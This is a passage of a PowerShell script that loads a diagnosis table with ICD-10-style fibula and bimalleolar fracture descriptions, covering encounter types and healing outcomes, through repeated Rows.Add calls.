fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of left fibula","Nondisplaced fracture of lateral malleolus of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of unspecified fibula","Nondisplaced fracture of lateral malleolus of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right fibula","Torus fracture of upper end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right fibula","Torus fracture of upper end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right fibula","Torus fracture of upper end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right fibula","Torus fracture of upper end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right fibula","Torus fracture of upper end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right fibula","Torus fracture of upper end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left fibula","Torus fracture of upper end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left fibula","Torus fracture of upper end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left fibula","Torus fracture of upper end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left fibula","Torus fracture of upper end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left fibula","Torus fracture of upper end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left fibula","Torus fracture of upper end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified fibula","Torus fracture of upper end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified fibula","Torus fracture of upper end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified fibula","Torus fracture of upper end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified fibula","Torus fracture of upper end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified fibula","Torus fracture of upper end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified fibula","Torus fracture of upper end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right fibula","Torus fracture of lower end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right fibula","Torus fracture of lower end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right fibula","Torus fracture of lower end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right fibula","Torus fracture of lower end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right fibula","Torus fracture of lower end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right fibula","Torus fracture of lower end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left fibula","Torus fracture of lower end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left fibula","Torus fracture of lower end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left fibula","Torus fracture of lower end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left fibula","Torus fracture of lower end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left fibula","Torus fracture of lower end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left fibula","Torus fracture of lower end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified fibula","Torus fracture of lower end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified fibula","Torus fracture of lower end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified fibula","Torus fracture of lower end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified fibula","Torus fracture of lower end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified fibula","Torus fracture of lower end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified fibula","Torus fracture of lower end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of right fibula","Other fracture of upper and lower end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of left fibula","Other fracture of upper and lower end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper and lower end of unspecified fibula","Other fracture of upper and lower end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of right lower leg","Displaced bimalleolar fracture of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of left lower leg","Displaced bimalleolar fracture of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced bimalleolar fracture of unspecified lower leg","Displaced bimalleolar fracture of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower 